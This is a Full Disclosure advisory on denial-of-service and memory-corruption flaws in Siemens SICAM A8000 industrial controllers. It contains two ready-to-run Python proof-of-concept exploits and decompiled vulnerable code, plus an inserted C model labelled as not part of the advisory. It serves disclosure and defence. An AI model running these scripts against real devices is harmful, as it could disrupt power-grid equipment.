CyberDanube Security Research 20260408-1 | Multiple Vulnerabilities in Siemens SICAM A8000

Full Disclosure mailing list archives


From: Thomas Weber | CyberDanube via Fulldisclosure <fulldisclosure () seclists org>
Date: Tue, 14 Apr 2026 10:45:01 +0000

CyberDanube Security Research 20260408-1
-------------------------------------------------------------------------------
                title| Multiple Vulnerabilities
              product| Siemens SICAM A8000 CP-8050/CP-8031/CP-8010/CP-8012
   vulnerable version| <=V25.30
        fixed version| V26.10
           CVE number| CVE-2026-27664
               impact| High
             homepage| https://siemens.com/
                found| 18.12.2025
                   by| S. Dietz
                     | (Office Vienna)
                     | CyberDanube Security Research
                     | Vienna
                     |
                     | This research was conducted in cooperation with
                     | VERBUND Digital Power during a penetration test.
                     |
                     | https://www.cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"Our purpose: We create technology to transform the everyday, for everyone.
By combining the real and the digital worlds, we can help accelerate both
digitalization and sustainability - so our customers around the world can
become more competitive, resilient and sustainable."

Source: https://www.siemens.com/global/en/company/about.html

Vulnerable versions
-------------------------------------------------------------------------------
Siemens SICAM A8000 CP-8050 Master Module (6MF2805-0AA00) / <=V25.30
Siemens SICAM A8000 CP-8031 Master Module (6MF2803-1AA00) / <=V25.30
Siemens SICAM A8000 CP-8010 Master Module (6MF2801-0AA00) / <=V25.31
Siemens SICAM A8000 CP-8012 Master Module (6MF2801-2AA00) / <=V25.31

See also the vendor advisory:
https://cert-portal.siemens.com/productcert/html/ssa-246443.html

Vulnerability overview
-------------------------------------------------------------------------------
1) Unauthenticated Denial of Service
A crafted POST request with a large Content-Length and a multipart boundary
but no matching body appears to make the parser wait for more data. As long as
that connection stays open, no other user can interact with the service.
IHI00.elf and RTUM85.elf are affected by this.

2) Unauthenticated Memory Corruption (CVE-2026-27664)
A crafted POST request with a malicious XML body can be sent to write null
bytes to an arbitrary memory address after the buffer's location. This may lead
to a denial of service or remote code execution. This affects the IHI00.elf as
well as the RTUM85.elf binary.

Proof of Concept
-------------------------------------------------------------------------------
1) Unauthenticated Denial of Service
The following Python script can be used to temporarily impact the availability
of the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/env python3
# S. Dietz <fitfrost4>
from pwn import *

IP = "localhost"
PORT = 8080
COMP = "ihi"
path = b""

if args.IP:
    IP = args.IP
if args.PORT:
    PORT = int(args.PORT)
if args.COMP:
    COMP = args.COMP
if COMP == "rtum85":
    path = b"/sicweb-ajax/rtum85/pwned"
elif COMP == "ihi":
    path = b"/sicweb-ajax/auth"

req = b""
req += b"POST " + path + b" HTTP/1.1\r\n"
req += b"Content-Length: " + str(13371337).encode() + b"\r\n"
req += b"Content-Type: multipart/form-data; boundary=--pwned\r\n"
req += b"User-Agent: Mozilla/5.0\r\n"
req += b"Accept: */*\r\n"
req += b"Accept-Encoding: gzip, deflate, br\r\n"
req += b"Connection: keep-alive\r\n"
req += b"\r\n"

log.info(req)

with remote(IP, PORT) as io:
    io.send(req)
    io.recv(1337)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-------------------------------------------------------------------------------
2) Unauthenticated Memory Corruption (CVE-2026-27664)
The following Python script can be used to crash the IHI00.elf application on
the device. As a watchdog (ISV00.elf) is active, the device reboots.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/env python3
# S. Dietz <fitfrost4>
from pwn import *

IP = "localhost"
PORT = 8080

if args.IP:
    IP = args.IP

if args.PORT:
    PORT = int(args.PORT)

buf = b'<?xml version="1.0" encoding="UTF-8"?>\n'
buf += b"<x>" * 0xa0000
buf += b"</x>"
buf += b"\r\n"

body = buf
req = b""
req += b"POST /sicweb-ajax/auth HTTP/1.1\r\n"
req += b"Content-Length: " + str(len(body)).encode() + b"\r\n"
req += b"sec-ch-ua: \"Chromium\";v=\"133\", \"Not(A:Brand\";v=\"99\"\r\n"
req += b"Content-Type: application/xml\r\n"
req += b"User-Agent: Mozilla/5.0\r\n"
req += b"Accept: */*\r\n"
req += b"Accept-Encoding: gzip, deflate, br\r\n"
req += b"Connection: keep-alive\r\n"
req += b"\r\n"
req += body

with remote(IP, PORT) as io:
    io.send(req)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The issue arises from a logic error in the XML parsing. Both binaries use
libexpat, which exports the function XML_SetElementHandler(); it takes a
user-defined structure as well as two function pointers that are executed when
an opening or closing tag occurs. Looking at start(), it can be observed that
tag_depth is tracked: if the depth is greater than 15, the return value is set
to -2, but tag_depth is incremented anyway.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0052b0d4    void start(struct userdata* userData, char const* xmlchar)
0052b0da        int32_t tag_depth = userData->tag_depth
0052b0e2        int32_t* entry_r2
0052b0e2
0052b0e2        if (tag_depth != 0)
0052b0e6            if (tag_depth != 1)
0052b0fa                if (tag_depth u> 0xf)
0052b0fa                    goto too_big
[...]
0052b152    too_big:
0052b152        userData->retval = -2
0052b154        userData->tag_depth = tag_depth + 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

When the matching closing tag occurs, end() is executed. Because retval is never
checked there, the userData access goes out of bounds, resulting in an
arbitrary null-byte overflow.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0052a570    void end(struct userdata* userData, char const* xmlchar)
[...]
0052a584
0052a588        int32_t tag_depth = userData->tag_depth
0052a58c        userData->tag_depth = tag_depth - 1
0052a58c
0052a58e        if (tag_depth != 1)
0052a598            *(userData + ((tag_depth - 2) << 2) + 4) = 0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Further investigation showed that the bug allows an attacker to write a word
of null bytes to arbitrary memory after the buffer's location, including the
stack. Due to the extensive use of shared libraries, this results in a large
attack surface.
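Added example (not code from the advisory, from Siemens or from libexpat): a C model of the start()/end() handler logic shown above, with a hardened end() next to it that honours the retval flag and bounds-checks the slot index. The struct layout, the 16-slot array, MAX_DEPTH/SLOTS and all function names are assumptions; only tag_depth, retval, the 0xf threshold and the "+4 + (depth-2)*4" store arithmetic come from the decompilation on the page.

```c
#include <stdint.h>
#include <string.h>
#define MAX_DEPTH 15  /* start() flags a depth above 0xf, as in the decompilation */
#define SLOTS     16  /* assumed size of the per-depth word array; not on the page */
/* Assumed layout: the page shows only tag_depth, retval and the store at
 * "+4 + (depth-2)*4", modelled here as slots[depth-2]. */
struct userdata { int32_t tag_depth; int32_t slots[SLOTS]; int32_t retval; };
/* start(): a too-deep document sets retval = -2, yet the depth counter keeps
 * growing, and that counter is what later drives end() past the array. */
static void start_tag(struct userdata *u)
{
    if ((uint32_t)u->tag_depth > MAX_DEPTH)
        u->retval = -2;
    u->tag_depth += 1;
}
/* Original end(): no retval check before the store. Instead of a wild write,
 * the model returns the slot index it would hit and clears it only if in range. */
static int32_t end_tag_unchecked(struct userdata *u)
{
    int32_t depth = u->tag_depth, idx = depth - 2;
    u->tag_depth = depth - 1;
    if (depth == 1)
        return -1;
    if (idx >= 0 && idx < SLOTS)
        u->slots[idx] = 0;
    return idx;  /* idx >= SLOTS: the null word would land past the buffer */
}
/* Hardened end(): honour the flag start() set and bounds-check the index. */
static int32_t end_tag_checked(struct userdata *u)
{
    int32_t depth = u->tag_depth, idx = depth - 2;
    u->tag_depth = depth - 1;
    if (u->retval == -2 || idx < 0 || idx >= SLOTS)
        return -1;  /* nothing written */
    u->slots[idx] = 0;
    return idx;
}
/* Feeds `nesting` nested tags through one end() model; returns the largest
 * slot index it reported, or -1 if it never stored anything. */
static int32_t worst_slot(int32_t nesting, int32_t (*end_fn)(struct userdata *))
{
    struct userdata u;
    int32_t i, idx, worst = -1;
    memset(&u, 0, sizeof u);
    for (i = 0; i < nesting; i++)
        start_tag(&u);
    for (i = 0; i < nesting; i++)
        if ((idx = end_fn(&u)) > worst)
            worst = idx;
    return worst;
}
```

With 40 nested tags the unchecked model reports slot 38, well past the 16-slot array, while the checked model refuses every store once start() has flagged the document.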
-------------------------------------------------------------------------------


Solution
-------------------------------------------------------------------------------
Install the latest version available.


Workaround
-------------------------------------------------------------------------------
Restrict network access to the device in the infrastructure.

Recommendation
-------------------------------------------------------------------------------
CyberDanube recommends performing a white-box security assessment of the SICAM
A8000 master module devices.


Contact Timeline
-------------------------------------------------------------------------------
2026-02-24: Contacting Siemens ProductCERT
2026-03-04: Siemens ProductCERT confirmed the issue but said the DoS is valid
            behavior for resource conservation.
2026-03-09: Asking for name and organization for acknowledgement. In addition,
            an estimate of the update timeline was given.
2026-03-26: Siemens ProductCERT publishes the advisory SSA-246443.
2026-04-08: Coordinated release of security advisory.


Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF S. Dietz / @2025
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Source: https://seclists.org/fulldisclosure/2026/Apr/7